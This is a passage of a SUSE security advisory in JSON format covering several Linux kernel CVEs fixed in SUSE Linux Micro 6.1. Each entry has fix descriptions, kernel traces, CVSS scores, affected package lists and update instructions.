"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53851"
},
{
"cve": "CVE-2023-53852",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53852"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix memory leak in dhchap_secret_store\n\nFree dhchap_secret in nvme_ctrl_dhchap_secret_store() before we return\nfix following kmemleack:-\n\nunreferenced object 0xffff8886376ea800 (size 64):\n comm \"check\", pid 22048, jiffies 4344316705 (age 92.199s)\n hex dump (first 32 bytes):\n 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg\n 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL\n backtrace:\n [\u003c0000000030ce5d4b\u003e] __kmalloc+0x4b/0x130\n [\u003c000000009be1cdc1\u003e] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core]\n [\u003c00000000ac06c96a\u003e] kernfs_fop_write_iter+0x12b/0x1c0\n [\u003c00000000437e7ced\u003e] vfs_write+0x2ba/0x3c0\n [\u003c00000000f9491baf\u003e] ksys_write+0x5f/0xe0\n [\u003c000000001c46513d\u003e] do_syscall_64+0x3b/0x90\n [\u003c00000000ecf348fe\u003e] entry_SYSCALL_64_after_hwframe+0x72/0xdc\nunreferenced object 0xffff8886376eaf00 (size 64):\n comm \"check\", pid 22048, jiffies 4344316736 (age 92.168s)\n hex dump (first 32 bytes):\n 44 48 48 43 2d 31 3a 30 30 3a 6e 78 72 35 4b 67 DHHC-1:00:nxr5Kg\n 75 58 34 75 6f 41 78 73 4a 61 34 63 2f 68 75 4c uX4uoAxsJa4c/huL\n backtrace:\n [\u003c0000000030ce5d4b\u003e] __kmalloc+0x4b/0x130\n [\u003c000000009be1cdc1\u003e] nvme_ctrl_dhchap_secret_store+0x8f/0x160 [nvme_core]\n [\u003c00000000ac06c96a\u003e] kernfs_fop_write_iter+0x12b/0x1c0\n [\u003c00000000437e7ced\u003e] vfs_write+0x2ba/0x3c0\n [\u003c00000000f9491baf\u003e] ksys_write+0x5f/0xe0\n [\u003c000000001c46513d\u003e] do_syscall_64+0x3b/0x90\n [\u003c00000000ecf348fe\u003e] entry_SYSCALL_64_after_hwframe+0x72/0xdc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53852",
"url": "https://www.suse.com/security/cve/CVE-2023-53852"
},
{
"category": "external",
"summary": "SUSE Bug 1254653 for CVE-2023-53852",
"url": "https://bugzilla.suse.com/1254653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53852"
},
{
"cve": "CVE-2023-53855",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53855"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: ocelot: call dsa_tag_8021q_unregister() under rtnl_lock() on driver remove\n\nWhen the tagging protocol in current use is \"ocelot-8021q\" and we unbind\nthe driver, we see this splat:\n\n$ echo \u00270000:00:00.2\u0027 \u003e /sys/bus/pci/drivers/fsl_enetc/unbind\nmscc_felix 0000:00:00.5 swp0: left promiscuous mode\nsja1105 spi2.0: Link is Down\nDSA: tree 1 torn down\nmscc_felix 0000:00:00.5 swp2: left promiscuous mode\nsja1105 spi2.2: Link is Down\nDSA: tree 3 torn down\nfsl_enetc 0000:00:00.2 eno2: left promiscuous mode\nmscc_felix 0000:00:00.5: Link is Down\n------------[ cut here ]------------\nRTNL: assertion failed at net/dsa/tag_8021q.c (409)\nWARNING: CPU: 1 PID: 329 at net/dsa/tag_8021q.c:409 dsa_tag_8021q_unregister+0x12c/0x1a0\nModules linked in:\nCPU: 1 PID: 329 Comm: bash Not tainted 6.5.0-rc3+ #771\npc : dsa_tag_8021q_unregister+0x12c/0x1a0\nlr : dsa_tag_8021q_unregister+0x12c/0x1a0\nCall trace:\n dsa_tag_8021q_unregister+0x12c/0x1a0\n felix_tag_8021q_teardown+0x130/0x150\n felix_teardown+0x3c/0xd8\n dsa_tree_teardown_switches+0xbc/0xe0\n dsa_unregister_switch+0x168/0x260\n felix_pci_remove+0x30/0x60\n pci_device_remove+0x4c/0x100\n device_release_driver_internal+0x188/0x288\n device_links_unbind_consumers+0xfc/0x138\n device_release_driver_internal+0xe0/0x288\n device_driver_detach+0x24/0x38\n unbind_store+0xd8/0x108\n drv_attr_store+0x30/0x50\n---[ end trace 0000000000000000 ]---\n------------[ cut here ]------------\nRTNL: assertion failed at net/8021q/vlan_core.c (376)\nWARNING: CPU: 1 PID: 329 at net/8021q/vlan_core.c:376 vlan_vid_del+0x1b8/0x1f0\nCPU: 1 PID: 329 Comm: bash Tainted: G W 6.5.0-rc3+ #771\npc : vlan_vid_del+0x1b8/0x1f0\nlr : vlan_vid_del+0x1b8/0x1f0\n dsa_tag_8021q_unregister+0x8c/0x1a0\n felix_tag_8021q_teardown+0x130/0x150\n felix_teardown+0x3c/0xd8\n dsa_tree_teardown_switches+0xbc/0xe0\n dsa_unregister_switch+0x168/0x260\n felix_pci_remove+0x30/0x60\n pci_device_remove+0x4c/0x100\n device_release_driver_internal+0x188/0x288\n device_links_unbind_consumers+0xfc/0x138\n device_release_driver_internal+0xe0/0x288\n device_driver_detach+0x24/0x38\n unbind_store+0xd8/0x108\n drv_attr_store+0x30/0x50\nDSA: tree 0 torn down\n\nThis was somewhat not so easy to spot, because \"ocelot-8021q\" is not the\ndefault tagging protocol, and thus, not everyone who tests the unbinding\npath may have switched to it beforehand. The default\nfelix_tag_npi_teardown() does not require rtnl_lock() to be held.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53855",
"url": "https://www.suse.com/security/cve/CVE-2023-53855"
},
{
"category": "external",
"summary": "SUSE Bug 1254688 for CVE-2023-53855",
"url": "https://bugzilla.suse.com/1254688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53855"
},
{
"cve": "CVE-2023-53856",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53856"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: overlay: Call of_changeset_init() early\n\nWhen of_overlay_fdt_apply() fails, the changeset may be partially\napplied, and the caller is still expected to call of_overlay_remove() to\nclean up this partial state.\n\nHowever, of_overlay_apply() calls of_resolve_phandles() before\ninit_overlay_changeset(). Hence if the overlay fails to apply due to an\nunresolved symbol, the overlay_changeset.cset.entries list is still\nuninitialized, and cleanup will crash with a NULL-pointer dereference in\noverlay_removal_is_ok().\n\nFix this by moving the call to of_changeset_init() from\ninit_overlay_changeset() to of_overlay_fdt_apply(), where all other\nearly initialization is done.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53856",
"url": "https://www.suse.com/security/cve/CVE-2023-53856"
},
{
"category": "external",
"summary": "SUSE Bug 1254661 for CVE-2023-53856",
"url": "https://bugzilla.suse.com/1254661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53856"
},
{
"cve": "CVE-2023-53857",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53857"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: bpf_sk_storage: Fix invalid wait context lockdep report\n\n\u0027./test_progs -t test_local_storage\u0027 reported a splat:\n\n[ 27.137569] =============================\n[ 27.138122] [ BUG: Invalid wait context ]\n[ 27.138650] 6.5.0-03980-gd11ae1b16b0a #247 Tainted: G O\n[ 27.139542] -----------------------------\n[ 27.140106] test_progs/1729 is trying to lock:\n[ 27.140713] ffff8883ef047b88 (stock_lock){-.-.}-{3:3}, at: local_lock_acquire+0x9/0x130\n[ 27.141834] other info that might help us debug this:\n[ 27.142437] context-{5:5}\n[ 27.142856] 2 locks held by test_progs/1729:\n[ 27.143352] #0: ffffffff84bcd9c0 (rcu_read_lock){....}-{1:3}, at: rcu_lock_acquire+0x4/0x40\n[ 27.144492] #1: ffff888107deb2c0 (\u0026storage-\u003elock){..-.}-{2:2}, at: bpf_local_storage_update+0x39e/0x8e0\n[ 27.145855] stack backtrace:\n[ 27.146274] CPU: 0 PID: 1729 Comm: test_progs Tainted: G O 6.5.0-03980-gd11ae1b16b0a #247\n[ 27.147550] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n[ 27.149127] Call Trace:\n[ 27.149490] \u003cTASK\u003e\n[ 27.149867] dump_stack_lvl+0x130/0x1d0\n[ 27.152609] dump_stack+0x14/0x20\n[ 27.153131] __lock_acquire+0x1657/0x2220\n[ 27.153677] lock_acquire+0x1b8/0x510\n[ 27.157908] local_lock_acquire+0x29/0x130\n[ 27.159048] obj_cgroup_charge+0xf4/0x3c0\n[ 27.160794] slab_pre_alloc_hook+0x28e/0x2b0\n[ 27.161931] __kmem_cache_alloc_node+0x51/0x210\n[ 27.163557] __kmalloc+0xaa/0x210\n[ 27.164593] bpf_map_kzalloc+0xbc/0x170\n[ 27.165147] bpf_selem_alloc+0x130/0x510\n[ 27.166295] bpf_local_storage_update+0x5aa/0x8e0\n[ 27.167042] bpf_fd_sk_storage_update_elem+0xdb/0x1a0\n[ 27.169199] bpf_map_update_value+0x415/0x4f0\n[ 27.169871] map_update_elem+0x413/0x550\n[ 27.170330] __sys_bpf+0x5e9/0x640\n[ 27.174065] __x64_sys_bpf+0x80/0x90\n[ 27.174568] do_syscall_64+0x48/0xa0\n[ 27.175201] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n[ 27.175932] RIP: 0033:0x7effb40e41ad\n[ 27.176357] Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d8\n[ 27.179028] RSP: 002b:00007ffe64c21fc8 EFLAGS: 00000202 ORIG_RAX: 0000000000000141\n[ 27.180088] RAX: ffffffffffffffda RBX: 00007ffe64c22768 RCX: 00007effb40e41ad\n[ 27.181082] RDX: 0000000000000020 RSI: 00007ffe64c22008 RDI: 0000000000000002\n[ 27.182030] RBP: 00007ffe64c21ff0 R08: 0000000000000000 R09: 00007ffe64c22788\n[ 27.183038] R10: 0000000000000064 R11: 0000000000000202 R12: 0000000000000000\n[ 27.184006] R13: 00007ffe64c22788 R14: 00007effb42a1000 R15: 0000000000000000\n[ 27.184958] \u003c/TASK\u003e\n\nIt complains about acquiring a local_lock while holding a raw_spin_lock.\nIt means it should not allocate memory while holding a raw_spin_lock\nsince it is not safe for RT.\n\nraw_spin_lock is needed because bpf_local_storage supports tracing\ncontext. In particular for task local storage, it is easy to\nget a \"current\" task PTR_TO_BTF_ID in tracing bpf prog.\nHowever, task (and cgroup) local storage has already been moved to\nbpf mem allocator which can be used after raw_spin_lock.\n\nThe splat is for the sk storage. For sk (and inode) storage,\nit has not been moved to bpf mem allocator. Using raw_spin_lock or not,\nkzalloc(GFP_ATOMIC) could theoretically be unsafe in tracing context.\nHowever, the local storage helper requires a verifier accepted\nsk pointer (PTR_TO_BTF_ID), it is hypothetical if that (mean running\na bpf prog in a kzalloc unsafe context and also able to hold a verifier\naccepted sk pointer) could happen.\n\nThis patch avoids kzalloc after raw_spin_lock to silent the splat.\nThere is an existing kzalloc before the raw_spin_lock. At that point,\na kzalloc is very likely required because a lookup has just been done\nbefore. Thus, this patch always does the kzalloc before acq\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53857",
"url": "https://www.suse.com/security/cve/CVE-2023-53857"
},
{
"category": "external",
"summary": "SUSE Bug 1254648 for CVE-2023-53857",
"url": "https://bugzilla.suse.com/1254648"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
